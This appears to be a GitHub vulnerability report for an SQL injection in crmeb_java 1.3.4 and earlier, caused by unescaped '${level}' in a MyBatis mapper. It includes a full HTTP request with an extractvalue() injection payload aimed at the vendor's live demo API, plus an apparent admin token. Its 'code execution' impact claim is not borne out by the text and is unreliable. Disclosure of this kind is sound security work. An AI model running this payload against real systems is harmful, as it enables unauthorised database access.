You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
[Impact Code execution]
true
[Cause of vulnerability]
\crmeb\crmeb-service\src\main\resources\mapper\user\UserMapper.xml
line 36 "${level}"
When using "${}", program will do not do any processing, and directly splice the value into the sql statement lead sqli
The text was updated successfully, but these errors were encountered:
[Suggested description]
sql injection vulnerability exists in crmeb_java <=1.3.4
/api/admin/user/list endpoint Unfiltered parameters 'level' cause sqli
[Vulnerability Type]
SQLi
[Vendor of Product]
https://github.com/crmeb/crmeb_java
[Affected Product Code Base]
<=1.3.4
[Affected Component]
GET /api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a% HTTP/2
Host: api.java.crmeb.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-Zation: 0d8ed99c6e51404f82a22ba15332300a
Origin: https://admin.java.crmeb.net
Referer: https://admin.java.crmeb.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
[Attack Type]
Remote
[Vulnerability details]
step 1 login admin click user Manager and click search button
step 2 intercept request use burpsuite
step 3 insert payload in paramter “level”
level=1+and+extractvalue(1,CONCAT(1,user()))
https://api.java.crmeb.net/api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a%
there you can see it
[Impact Code execution]
true
[Cause of vulnerability]
\crmeb\crmeb-service\src\main\resources\mapper\user\UserMapper.xml
line 36 "${level}"
When using "${}", program will do not do any processing, and directly splice the value into the sql statement lead sqli
The text was updated successfully, but these errors were encountered: